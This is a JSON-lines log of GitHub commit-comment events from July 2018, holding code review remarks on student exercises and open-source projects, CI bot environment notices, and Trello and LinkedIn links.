{"id":"8005799527","type":"CommitCommentEvent","actor":{"login":"TomasVotruba"},"repo":{"name":"Automattic/phpcs-neutron-standard"},"payload":{"comment":{"id":29804492,"position":11,"line":23,"path":"composer.json","commit_id":"40642df5ec9ea39871f1b99ada7fa34976169788","created_at":"2018-07-23T18:58:56Z","updated_at":"2018-07-23T18:58:56Z","author_association":"CONTRIBUTOR","body":"I see. If you ever get to use PHP 7.1, you can look at [EasyCodingStandard](https://github.com/symplify/easyCodingStandard/). Tool I made to combine PHP_CodeSniffer and PHP CS Fixer in nice UX way.\r\n\r\nTo skip all the boring stuff, jump right to [How to Migrate From PHP_CodeSniffer to EasyCodingStandard in 7 Steps](https://www.tomasvotruba.cz/blog/2018/06/04/how-to-migrate-from-php-code-sniffer-to-easy-coding-standard/), that describes the basics."}},"created_at":"2018-07-23T18:58:56Z"}
{"id":"8005804098","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29804499,"position":13,"line":13,"path":"week_four/HW8ex2/OneSpace.java","commit_id":"9830c0d976273ddad32e23664a7953cf335051e7","created_at":"2018-07-23T18:59:53Z","updated_at":"2018-07-23T18:59:53Z","author_association":"OWNER","body":"Спробуй використати, наприклад, метод replace() чи replaceAll() і тоді на потрібно буде створювати масив стрінгів"}},"created_at":"2018-07-23T18:59:53Z"}
{"id":"8005816766","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29804540,"position":null,"line":null,"path":null,"commit_id":"510415cd4969fba3af7ecf44808f96b7a53d106c","created_at":"2018-07-23T19:02:25Z","updated_at":"2018-07-23T19:02:25Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-961](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-961).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-961-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-23T19:02:25Z"}
{"id":"8005817126","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29804541,"position":null,"line":null,"path":null,"commit_id":"76ae8a53319a5ae01e56a3007e2b409d54aecde2","created_at":"2018-07-23T19:02:29Z","updated_at":"2018-07-23T19:02:29Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-511](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-511).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-511-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-23T19:02:29Z"}
{"id":"8005818004","type":"CommitCommentEvent","actor":{"login":"jordanch"},"repo":{"name":"mauriceLC92/js-assessment"},"payload":{"comment":{"id":29804547,"position":null,"line":null,"path":null,"commit_id":"61d9315dc82d4f2c5de371f18142396026ff5404","created_at":"2018-07-23T19:02:38Z","updated_at":"2018-07-23T19:02:38Z","author_association":"COLLABORATOR","body":"mooi!"}},"created_at":"2018-07-23T19:02:38Z"}
{"id":"8005822865","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29804551,"position":17,"line":17,"path":"Homework8/MainL8Ex3.java","commit_id":"8a277b6ff94c7877ee7e5a64a7636be05456f32f","created_at":"2018-07-23T19:03:39Z","updated_at":"2018-07-23T19:03:39Z","author_association":"OWNER","body":"тут краще використовувати метод find()\r\nНам потрібно ввести текст і знайти в ньому всі згадки про долари:)"}},"created_at":"2018-07-23T19:03:39Z"}
{"id":"8005829433","type":"CommitCommentEvent","actor":{"login":"leszekbednorz"},"repo":{"name":"leszekbednorz/sample1_group6"},"payload":{"comment":{"id":29804565,"position":2,"line":21,"path":".gitignore","commit_id":"4e8cad706819c5c062b2ef781cf6a290c5949a3d","created_at":"2018-07-23T19:04:58Z","updated_at":"2018-07-23T19:04:58Z","author_association":"OWNER","body":"sdasdf asd fasd fasd f"}},"created_at":"2018-07-23T19:04:58Z"}
{"id":"8005833219","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29804574,"position":17,"line":17,"path":"week_four/HW8ex3/USDvar.java","commit_id":"fe355f0aa0b69ce69a18bd745b3387f97d6e22e3","created_at":"2018-07-23T19:05:41Z","updated_at":"2018-07-23T19:05:41Z","author_association":"OWNER","body":"Нам потрібно ввести текст і знайти в ньому всі співрадіння типу $15, $2.56, тому тут краще використати метод find() і поправити патерн"}},"created_at":"2018-07-23T19:05:41Z"}
{"id":"8005833979","type":"CommitCommentEvent","actor":{"login":"scopatz"},"repo":{"name":"Quansight/conda-recipe-cudatoolkit-dev"},"payload":{"comment":{"id":29804575,"position":3,"line":2,"path":"condarecipe9.2/build.sh","commit_id":"69bcf6d1130aef4c86f3977452d5c9da4f22a065","created_at":"2018-07-23T19:05:51Z","updated_at":"2018-07-23T19:05:51Z","author_association":"NONE","body":"I am not sure that we need a build.sh file.  Also where does this build.py file exist at?"}},"created_at":"2018-07-23T19:05:51Z"}
{"id":"8005834754","type":"CommitCommentEvent","actor":{"login":"grubsteak"},"repo":{"name":"CleverRaven/Cataclysm-DDA"},"payload":{"comment":{"id":29804578,"position":null,"line":null,"path":null,"commit_id":"561be2f1625d16b0ab28158fddffcbb355a13525","created_at":"2018-07-23T19:06:00Z","updated_at":"2018-07-23T19:06:00Z","author_association":"NONE","body":"it is a subject-verb agreement mistake."}},"created_at":"2018-07-23T19:06:00Z"}
{"id":"8005836898","type":"CommitCommentEvent","actor":{"login":"scopatz"},"repo":{"name":"Quansight/conda-recipe-cudatoolkit-dev"},"payload":{"comment":{"id":29804584,"position":2,"line":1,"path":"condarecipe9.2/bld.bat","commit_id":"5eb39fed28d62fa217c1ecc5827614916665b7cc","created_at":"2018-07-23T19:06:24Z","updated_at":"2018-07-23T19:06:24Z","author_association":"NONE","body":"I don't think this is needed."}},"created_at":"2018-07-23T19:06:24Z"}
{"id":"8005838096","type":"CommitCommentEvent","actor":{"login":"rushirajnenuji"},"repo":{"name":"NCEAS/metacatui"},"payload":{"comment":{"id":29804586,"position":6,"line":39,"path":"src/js/themes/dataone/models/AppModel.js","commit_id":"17c1aac7f68837936b4e9a726930aa0169fdd6c5","created_at":"2018-07-23T19:06:37Z","updated_at":"2018-07-23T19:06:37Z","author_association":"CONTRIBUTOR","body":"Hey @amoeba, I noticed this change in `dev-2.1` and traced back to this commit. Is this intentional? Is this something we need for the routing refactoring, or would it be safe for us to revert back this change?"}},"created_at":"2018-07-23T19:06:37Z"}
{"id":"8005839619","type":"CommitCommentEvent","actor":{"login":"Mortiferr"},"repo":{"name":"perfectimprints/promotional-ideas"},"payload":{"comment":{"id":29804591,"position":692,"line":854,"path":"comfort-colors-swatches/comfort-colors-swatches.html","commit_id":"735971d8e9a8735a954c3e26508fa7c5f4fe9a80","created_at":"2018-07-23T19:06:58Z","updated_at":"2018-07-23T19:06:58Z","author_association":"COLLABORATOR","body":"why `jQuery.`..."}},"created_at":"2018-07-23T19:06:58Z"}
{"id":"8005843279","type":"CommitCommentEvent","actor":{"login":"scopatz"},"repo":{"name":"Quansight/conda-recipe-cudatoolkit-dev"},"payload":{"comment":{"id":29804599,"position":1,"line":13,"path":"condarecipe9.2/meta.yaml","commit_id":"3d733b0fef595ef821a949169b20fea71cd3e919","created_at":"2018-07-23T19:07:43Z","updated_at":"2018-07-23T19:07:43Z","author_association":"NONE","body":"For conda-forge, this `../src/` directory, will have to be moved into the recipe directory"}},"created_at":"2018-07-23T19:07:43Z"}
{"id":"8005847016","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"peercoin/peercoin"},"payload":{"comment":{"id":29804605,"position":null,"line":null,"path":null,"commit_id":"e139e61060a990ee6bf6df04f54c08bd77928565","created_at":"2018-07-23T19:08:27Z","updated_at":"2018-07-23T19:08:27Z","author_association":"NONE","body":"e139e61"}},"created_at":"2018-07-23T19:08:27Z"}
{"id":"8005849820","type":"CommitCommentEvent","actor":{"login":"greven"},"repo":{"name":"greven/oUF_lumen"},"payload":{"comment":{"id":29804611,"position":null,"line":null,"path":null,"commit_id":"70306c24794e6467d85afdd4ac1a9a663b768360","created_at":"2018-07-23T19:09:01Z","updated_at":"2018-07-23T19:09:01Z","author_association":"OWNER","body":"That is A LOT of development effort which I don't have. \r\nBut since this is open source anyone is free to contribute. :)"}},"created_at":"2018-07-23T19:09:01Z"}
{"id":"8005850377","type":"CommitCommentEvent","actor":{"login":"Pako7"},"repo":{"name":"brighanS/vclub"},"payload":{"comment":{"id":29804613,"position":53,"line":53,"path":"app/assets/stylesheets/scaffolds.scss","commit_id":"f5ba70e165dd502a4186b041da4aa762233b8075","created_at":"2018-07-23T19:09:08Z","updated_at":"2018-07-23T19:09:08Z","author_association":"NONE","body":".field-with-errors"}},"created_at":"2018-07-23T19:09:08Z"}
{"id":"8005850794","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29804614,"position":63,"line":63,"path":"src/main/java/com/github/cranite/MoreEnchantables/Configuration.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-23T19:09:13Z","updated_at":"2018-07-23T19:09:13Z","author_association":"OWNER","body":"The result of this is still that if the user messes up the config in some way, he has no way to find out whats wrong without having someone else who can read the code and debug the issue. That's bad. You know exactly what's the issue in each of those conditions, so why not tell the user?\r\n\r\n\r\nIf a section is misspelled or missaligned  it just quietly skips it (which is even worse than throwing an Exception) and a missspelled item identifier wont tell the user more than a stacktrace \"IAE at line ....\"\r\n\r\nImagine your plugin was a configurable desktop app, would you consider this acceptable behavior for one of those?\r\n\r\nAlso I dont understand why you so vehemently refuse to catch specifically IAEs\r\n\r\nLet's say you have a list in your config with 100 items and one of them is missspelled. Would you not say it is better to catch the IAE, print a message saying which identifier is broken and continue with the 99 correct ones? \r\n"}},"created_at":"2018-07-23T19:09:13Z"}
{"id":"8005851742","type":"CommitCommentEvent","actor":{"login":"Pako7"},"repo":{"name":"brighanS/vclub"},"payload":{"comment":{"id":29804618,"position":49,"line":49,"path":"app/assets/stylesheets/scaffolds.scss","commit_id":"f5ba70e165dd502a4186b041da4aa762233b8075","created_at":"2018-07-23T19:09:25Z","updated_at":"2018-07-23T19:09:25Z","author_association":"NONE","body":"class instead id"}},"created_at":"2018-07-23T19:09:25Z"}
{"id":"8005852818","type":"CommitCommentEvent","actor":{"login":"asmaulislam"},"repo":{"name":"asmaulislam/Professional-Development"},"payload":{"comment":{"id":29804622,"position":null,"line":null,"path":null,"commit_id":"f259694df8e6ac8c4ffd1d18e09543743c836188","created_at":"2018-07-23T19:09:39Z","updated_at":"2018-07-23T19:09:39Z","author_association":"OWNER","body":"https://www.linkedin.com/in/asmaul-islam-hridoy-56b870141/"}},"created_at":"2018-07-23T19:09:39Z"}
{"id":"8005854970","type":"CommitCommentEvent","actor":{"login":"rom1504"},"repo":{"name":"louis030195/xmoto-gym"},"payload":{"comment":{"id":29804627,"position":1,"line":1,"path":"pretrain.txt","commit_id":"2467cc5d1d4304e3c2395a06e0a26da6c2d8ada8","created_at":"2018-07-23T19:10:07Z","updated_at":"2018-07-23T19:10:07Z","author_association":"COLLABORATOR","body":"lol"}},"created_at":"2018-07-23T19:10:07Z"}
{"id":"8005856544","type":"CommitCommentEvent","actor":{"login":"hbvhuwe"},"repo":{"name":"hbvhuwe/explorer-github"},"payload":{"comment":{"id":29804632,"position":null,"line":null,"path":null,"commit_id":"4f0ec964d37202707938baedaed6804e4c79d34b","created_at":"2018-07-23T19:10:24Z","updated_at":"2018-07-23T19:10:24Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Link opening support](https://trello.com/c/mN1r91YI/8-link-opening-support)"}},"created_at":"2018-07-23T19:10:24Z"}
{"id":"8005856704","type":"CommitCommentEvent","actor":{"login":"Pako7"},"repo":{"name":"brighanS/vclub"},"payload":{"comment":{"id":29804633,"position":1,"line":1,"path":"app/helpers/movies_helper.rb","commit_id":"f5ba70e165dd502a4186b041da4aa762233b8075","created_at":"2018-07-23T19:10:26Z","updated_at":"2018-07-23T19:10:26Z","author_association":"NONE","body":"Remove"}},"created_at":"2018-07-23T19:10:26Z"}
{"id":"8005857794","type":"CommitCommentEvent","actor":{"login":"foysalhaqueshifat"},"repo":{"name":"tanmoyie/Professional-Development"},"payload":{"comment":{"id":29804635,"position":null,"line":null,"path":null,"commit_id":"f259694df8e6ac8c4ffd1d18e09543743c836188","created_at":"2018-07-23T19:10:39Z","updated_at":"2018-07-23T19:10:39Z","author_association":"NONE","body":"https://www.linkedin.com/in/foysal-haque-6a5484169/"}},"created_at":"2018-07-23T19:10:39Z"}
{"id":"8005858341","type":"CommitCommentEvent","actor":{"login":"jordanch"},"repo":{"name":"mauriceLC92/js-assessment"},"payload":{"comment":{"id":29804638,"position":4,"line":5,"path":"app/arrays.js","commit_id":"61d9315dc82d4f2c5de371f18142396026ff5404","created_at":"2018-07-23T19:10:46Z","updated_at":"2018-07-23T19:10:46Z","author_association":"COLLABORATOR","body":"What if `arr` is not actually an array? Then your program will crash because youre trying to invoke a function that probably doesnt exist. \r\n\r\nAdd guarding like so\r\n\r\n```\r\nif (Array.isArray(arr)) {\r\n    return arr.indexOf(item)\r\n}\r\n```\r\nOR\r\n```\r\nreturn Array.isArray(arr) && arr.indexOf(item) \r\n```\r\n\r\nCheck out: \r\n\r\n- https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/isArray\r\n- https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Expressions_and_Operators#Logical"}},"created_at":"2018-07-23T19:10:46Z"}
{"id":"8005861570","type":"CommitCommentEvent","actor":{"login":"MikeTschudi"},"repo":{"name":"Esri/arcgis-rest-js"},"payload":{"comment":{"id":29804642,"position":null,"line":null,"path":null,"commit_id":"7b45f4bf2a436bd4785915dbb0e70633d9edd251","created_at":"2018-07-23T19:11:25Z","updated_at":"2018-07-23T19:11:25Z","author_association":"MEMBER","body":"@jgravois , would you please review these changes?\r\n\r\nFor reasonable browsers, a Blob can be converted into a File and sent up with its filename. For IE 11 & Edge, the File constructor is not available, and even if one adds the missing File properties to the Blob, it's sent up to AGOL as \"blob\" by these two browsers. Changing encode-form-data to use the filename in the FormData.append call gets past this behavior.\r\n\r\nI changed the name of `IItemJsonDataRequestOptions` from a documentation perspective since it can be used by both the JSON and binary functions.\r\n\r\nWill work on test code next.\r\n\r\nThanks!"}},"created_at":"2018-07-23T19:11:25Z"}
{"id":"8005861614","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"RodinaSN/Lesson2"},"payload":{"comment":{"id":29804643,"position":15,"line":15,"path":"Quadratic.rb","commit_id":"6562d62198852267eac5294d1bbd497505c46aa4","created_at":"2018-07-23T19:11:26Z","updated_at":"2018-07-23T19:11:26Z","author_association":"NONE","body":"Проблема с отступами, необходимо настроить редактор на soft tab (2 пробела), а также выровнять блок\r\nТакже код станет лучше, если вычисление вынести в переменную, а не вычислять в строке"}},"created_at":"2018-07-23T19:11:26Z"}
{"id":"8005861721","type":"CommitCommentEvent","actor":{"login":"hbvhuwe"},"repo":{"name":"hbvhuwe/explorer-github"},"payload":{"comment":{"id":29804644,"position":null,"line":null,"path":null,"commit_id":"c410fd4cc7ed66061bc42a6cac672ad44b83a98e","created_at":"2018-07-23T19:11:28Z","updated_at":"2018-07-23T19:11:28Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [UserDao + UserRepository](https://trello.com/c/ePQB3JzV/1-userdao-userrepository)"}},"created_at":"2018-07-23T19:11:28Z"}
{"id":"8005863186","type":"CommitCommentEvent","actor":{"login":"ezyang"},"repo":{"name":"pytorch/pytorch"},"payload":{"comment":{"id":29804647,"position":4,"line":4,"path":"aten/src/ATen/native/cuda/CUDAScalar.cu","commit_id":"c082a7839942ea0f8826a36ce00c9418419b16da","created_at":"2018-07-23T19:11:46Z","updated_at":"2018-07-23T19:11:46Z","author_association":"CONTRIBUTOR","body":"This got fixed once @mruberry's CUDAContext patch was fixed."}},"created_at":"2018-07-23T19:11:46Z"}
{"id":"8005863596","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"RodinaSN/Lesson2"},"payload":{"comment":{"id":29804654,"position":7,"line":7,"path":"SquareTriangle.rb","commit_id":"6562d62198852267eac5294d1bbd497505c46aa4","created_at":"2018-07-23T19:11:51Z","updated_at":"2018-07-23T19:11:51Z","author_association":"NONE","body":"пробелы вокруг равно, код должен выглядеть одинаково"}},"created_at":"2018-07-23T19:11:51Z"}
{"id":"8005863611","type":"CommitCommentEvent","actor":{"login":"WFrancois"},"repo":{"name":"RaiderIO/raiderio-addon"},"payload":{"comment":{"id":29804655,"position":10,"line":2629,"path":"core.lua","commit_id":"7b3604dacd1256d84e68a88b43694bfe40735786","created_at":"2018-07-23T19:11:51Z","updated_at":"2018-07-23T19:11:51Z","author_association":"COLLABORATOR","body":"Sadly no :( \r\n\r\nI tried and i didn't work, and then saw https://stackoverflow.com/questions/3462370/logical-or-in-lua-patterns"}},"created_at":"2018-07-23T19:11:51Z"}
{"id":"8005864806","type":"CommitCommentEvent","actor":{"login":"hbvhuwe"},"repo":{"name":"hbvhuwe/explorer-github"},"payload":{"comment":{"id":29804659,"position":null,"line":null,"path":null,"commit_id":"c410fd4cc7ed66061bc42a6cac672ad44b83a98e","created_at":"2018-07-23T19:12:07Z","updated_at":"2018-07-23T19:12:07Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [RepoDao + RepoRepository](https://trello.com/c/K9zMmIYU/2-repodao-reporepository)"}},"created_at":"2018-07-23T19:12:07Z"}
{"id":"8005865639","type":"CommitCommentEvent","actor":{"login":"asmaulislam"},"repo":{"name":"tanmoyie/Professional-Development"},"payload":{"comment":{"id":29804662,"position":null,"line":null,"path":null,"commit_id":"f259694df8e6ac8c4ffd1d18e09543743c836188","created_at":"2018-07-23T19:12:18Z","updated_at":"2018-07-23T19:12:18Z","author_association":"NONE","body":"https://www.linkedin.com/in/asmaul-islam-hridoy-56b870141/"}},"created_at":"2018-07-23T19:12:18Z"}
{"id":"8005867367","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"RodinaSN/Lesson2"},"payload":{"comment":{"id":29804663,"position":15,"line":15,"path":"pifagor.rb","commit_id":"6562d62198852267eac5294d1bbd497505c46aa4","created_at":"2018-07-23T19:12:40Z","updated_at":"2018-07-23T19:12:40Z","author_association":"NONE","body":"Здесь тоже проблема с отступами, нужно поправить"}},"created_at":"2018-07-23T19:12:40Z"}
{"id":"8005872250","type":"CommitCommentEvent","actor":{"login":"koyach"},"repo":{"name":"SALTISES4/dalite-ng"},"payload":{"comment":{"id":29804671,"position":null,"line":null,"path":null,"commit_id":"42645e40d65eeaf1b7048d91f1cb422344273073","created_at":"2018-07-23T19:13:38Z","updated_at":"2018-07-23T19:13:38Z","author_association":"NONE","body":"good job"}},"created_at":"2018-07-23T19:13:38Z"}
{"id":"8005876611","type":"CommitCommentEvent","actor":{"login":"Pako7"},"repo":{"name":"brighanS/vclub"},"payload":{"comment":{"id":29804683,"position":13,"line":24,"path":"app/assets/stylesheets/application.scss","commit_id":"afbee101f450d8a5574e3b5293de25bd93b7a5fc","created_at":"2018-07-23T19:14:31Z","updated_at":"2018-07-23T19:14:31Z","author_association":"NONE","body":"class .black-button"}},"created_at":"2018-07-23T19:14:31Z"}
{"id":"8005880267","type":"CommitCommentEvent","actor":{"login":"braver"},"repo":{"name":"SublimeLinter/SublimeLinter-phpcs"},"payload":{"comment":{"id":29804694,"position":null,"line":null,"path":null,"commit_id":"e817cd4935345e25170e3dd45acc5ff4b03cc6fb","created_at":"2018-07-23T19:15:16Z","updated_at":"2018-07-23T19:15:16Z","author_association":"MEMBER","body":"Well my max level of effort for smoothing things like this out for end users is admittedly a bit low. Perhaps too low to actually do this stuff. \r\n\r\nI believe people will figure it out and it'll be fine and I won't have wasted the effort that would have gone unappreciated anyway. The only time I got a (exactly 1) user angry about an update (that wasn't the wholesale SL4 change) was when I changed some colors in a color scheme. I can totally get why you probably don't like that style of maintenance though, so if you'd rather do the nice notification yourself just let me know. I'm not against it, it's just not how I like to spend my spare time."}},"created_at":"2018-07-23T19:15:16Z"}
{"id":"8005886795","type":"CommitCommentEvent","actor":{"login":"Pako7"},"repo":{"name":"brighanS/vclub"},"payload":{"comment":{"id":29804706,"position":41,"line":27,"path":"app/views/movies/index.html.erb","commit_id":"afbee101f450d8a5574e3b5293de25bd93b7a5fc","created_at":"2018-07-23T19:16:38Z","updated_at":"2018-07-23T19:16:38Z","author_association":"NONE","body":"helper de rails"}},"created_at":"2018-07-23T19:16:38Z"}
{"id":"8005889745","type":"CommitCommentEvent","actor":{"login":"scopatz"},"repo":{"name":"Quansight/conda-recipe-cudatoolkit-dev"},"payload":{"comment":{"id":29804709,"position":19,"line":17,"path":"condarecipe9.2/scripts/activate.d/cudatoolkit-dev-activate.sh","commit_id":"eb4d5befd4c9a9a4d67fd77e5b20093bbec5957b","created_at":"2018-07-23T19:17:14Z","updated_at":"2018-07-23T19:17:14Z","author_association":"NONE","body":"The version number shouldn't be hard coded here.  Rather, you should extract it from `$PKG_VERSION`, or just use `$PKG_NAME` as the name of the package."}},"created_at":"2018-07-23T19:17:14Z"}
{"id":"8005890357","type":"CommitCommentEvent","actor":{"login":"FernandoGurgel"},"repo":{"name":"UEA-dspace/dspace"},"payload":{"comment":{"id":29804715,"position":null,"line":null,"path":null,"commit_id":"9b469e4f31fd7fa2b959e18dbd0118d4fc57fc97","created_at":"2018-07-23T19:17:21Z","updated_at":"2018-07-23T19:17:21Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Reparo de erro ficha catalografia](https://trello.com/c/j0xZ0eJj/38-reparo-de-erro-ficha-catalografia)"}},"created_at":"2018-07-23T19:17:21Z"}
{"id":"8005891509","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"6568973/Intensive-RUBY"},"payload":{"comment":{"id":29804722,"position":55,"line":55,"path":"lesson1/Right_trngl.rb","commit_id":"d16536405525afc5f0961c1b4ea472c3b23ae40a","created_at":"2018-07-23T19:17:36Z","updated_at":"2018-07-23T19:17:36Z","author_association":"NONE","body":"Такая простая задача и так много условий. Это не рационально. Лучше сначала определить большую сторону (возможную гипотенузу) и две меньшие стороны. Для этого можно использовать функцию sort:\r\n[a, b, c].sort!\r\nили еще проще функции max и min (в функцию min можно передать параметр и получить несколько значений)\r\nВ общем нужен рефакторинг 😄 "}},"created_at":"2018-07-23T19:17:36Z"}
{"id":"8005892446","type":"CommitCommentEvent","actor":{"login":"Pako7"},"repo":{"name":"brighanS/vclub"},"payload":{"comment":{"id":29804724,"position":13,"line":37,"path":"app/views/movies/index.html.erb","commit_id":"5544265e5756f5f4a780d65254f18387fe106252","created_at":"2018-07-23T19:17:48Z","updated_at":"2018-07-23T19:17:48Z","author_association":"NONE","body":"helper path"}},"created_at":"2018-07-23T19:17:48Z"}
{"id":"8005893646","type":"CommitCommentEvent","actor":{"login":"ntotten"},"repo":{"name":"forcedotcom/salesforcedx-vscode"},"payload":{"comment":{"id":29804726,"position":5,"line":55,"path":"packages/salesforcedx-vscode-core/package.nls.json","commit_id":"8d679183fe0746a2c2f65177ef21a07f7b249e50","created_at":"2018-07-23T19:18:01Z","updated_at":"2018-07-23T19:18:01Z","author_association":"MEMBER","body":"Change to something like \"SFDX: Create Project with Manifest\" //cc @ruthemmanuelle "}},"created_at":"2018-07-23T19:18:01Z"}
{"id":"8005894705","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"6568973/Intensive-RUBY"},"payload":{"comment":{"id":29804729,"position":13,"line":13,"path":"lesson1/idealniy_ves.rb","commit_id":"d16536405525afc5f0961c1b4ea472c3b23ae40a","created_at":"2018-07-23T19:18:14Z","updated_at":"2018-07-23T19:18:14Z","author_association":"NONE","body":"Лучше вычисление заносить в переменную, а в строке использовать ее. Так твой код будет выгядеть лучше"}},"created_at":"2018-07-23T19:18:14Z"}
{"id":"8005899840","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"6568973/Intensive-RUBY"},"payload":{"comment":{"id":29804734,"position":21,"line":21,"path":"lesson1/idealniy_ves.rb","commit_id":"d16536405525afc5f0961c1b4ea472c3b23ae40a","created_at":"2018-07-23T19:19:17Z","updated_at":"2018-07-23T19:19:17Z","author_association":"NONE","body":"Много пустых строк между кодом. Рекомендую почитать [ruby style guide](https://github.com/rubocop-hq/ruby-style-guide)"}},"created_at":"2018-07-23T19:19:17Z"}
{"id":"8005900729","type":"CommitCommentEvent","actor":{"login":"MarkoPaasila"},"repo":{"name":"vanissoft/DEXhub"},"payload":{"comment":{"id":29804738,"position":null,"line":null,"path":null,"commit_id":"0103d96b36e360987878fe8f6bd7b8a65dfd3002","created_at":"2018-07-23T19:19:28Z","updated_at":"2018-07-23T19:19:28Z","author_association":"NONE","body":"Nice! I'm looking forward...\r\n"}},"created_at":"2018-07-23T19:19:28Z"}
{"id":"8005902357","type":"CommitCommentEvent","actor":{"login":"aman2910k"},"repo":{"name":"aman2910k/Titanic-ML-from-Disaster"},"payload":{"comment":{"id":29804746,"position":null,"line":null,"path":null,"commit_id":"b7fec44bd9add4a82cc3c9876d130fbbf1983723","created_at":"2018-07-23T19:19:49Z","updated_at":"2018-07-23T19:19:49Z","author_association":"OWNER","body":"Top 6%"}},"created_at":"2018-07-23T19:19:49Z"}
{"id":"8005902369","type":"CommitCommentEvent","actor":{"login":"arif98741"},"repo":{"name":"arif98741/gitcom"},"payload":{"comment":{"id":29804747,"position":null,"line":null,"path":null,"commit_id":"8bc72227a613b8cc48cfc27a0f4feaf72d4b70b5","created_at":"2018-07-23T19:19:49Z","updated_at":"2018-07-23T19:19:49Z","author_association":"OWNER","body":"Thanks for your valuable contribution to the online git command repository"}},"created_at":"2018-07-23T19:19:49Z"}
{"id":"8005904825","type":"CommitCommentEvent","actor":{"login":"amoeba"},"repo":{"name":"NCEAS/metacatui"},"payload":{"comment":{"id":29804751,"position":6,"line":39,"path":"src/js/themes/dataone/models/AppModel.js","commit_id":"17c1aac7f68837936b4e9a726930aa0169fdd6c5","created_at":"2018-07-23T19:20:21Z","updated_at":"2018-07-23T19:20:21Z","author_association":"CONTRIBUTOR","body":"ah yes, please revert this diff! Nice catch."}},"created_at":"2018-07-23T19:20:21Z"}
{"id":"8005905621","type":"CommitCommentEvent","actor":{"login":"ntotten"},"repo":{"name":"forcedotcom/salesforcedx-vscode"},"payload":{"comment":{"id":29804752,"position":7,"line":48,"path":"packages/salesforcedx-vscode-core/src/commands/index.ts","commit_id":"8d679183fe0746a2c2f65177ef21a07f7b249e50","created_at":"2018-07-23T19:20:31Z","updated_at":"2018-07-23T19:20:31Z","author_association":"MEMBER","body":"`forceSfdxProjectWithManifestCreate`?"}},"created_at":"2018-07-23T19:20:31Z"}
{"id":"8005906196","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"6568973/Intensive-RUBY"},"payload":{"comment":{"id":29804754,"position":17,"line":17,"path":"lesson1/quadratic_equation.rb","commit_id":"d16536405525afc5f0961c1b4ea472c3b23ae40a","created_at":"2018-07-23T19:20:39Z","updated_at":"2018-07-23T19:20:39Z","author_association":"NONE","body":"Красная стрелка указывает на то, что нет пустой строки в конце файла. Можно настроить большинство современных редакторов, чтобы они следили за этим и добавляли такую строку за тебя"}},"created_at":"2018-07-23T19:20:39Z"}
{"id":"8005907899","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"6568973/Intensive-RUBY"},"payload":{"comment":{"id":29804761,"position":11,"line":11,"path":"lesson1/triangle_sqr.rb","commit_id":"d16536405525afc5f0961c1b4ea472c3b23ae40a","created_at":"2018-07-23T19:20:59Z","updated_at":"2018-07-23T19:20:59Z","author_association":"NONE","body":"Необходимы пробелы вокруг знака деления"}},"created_at":"2018-07-23T19:20:59Z"}
{"id":"8005908683","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29804762,"position":null,"line":null,"path":null,"commit_id":"54b1be92b5ca0bbc0d84e81ab13790b72f18e4b0","created_at":"2018-07-23T19:21:09Z","updated_at":"2018-07-23T19:21:09Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-264](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-264).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-264-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-23T19:21:09Z"}
{"id":"8005909125","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"6568973/Intensive-RUBY"},"payload":{"comment":{"id":29804765,"position":9,"line":9,"path":"lesson1/triangle_sqr.rb","commit_id":"d16536405525afc5f0961c1b4ea472c3b23ae40a","created_at":"2018-07-23T19:21:14Z","updated_at":"2018-07-23T19:21:14Z","author_association":"NONE","body":"Значения основания и высоты могут быть и дробными"}},"created_at":"2018-07-23T19:21:14Z"}
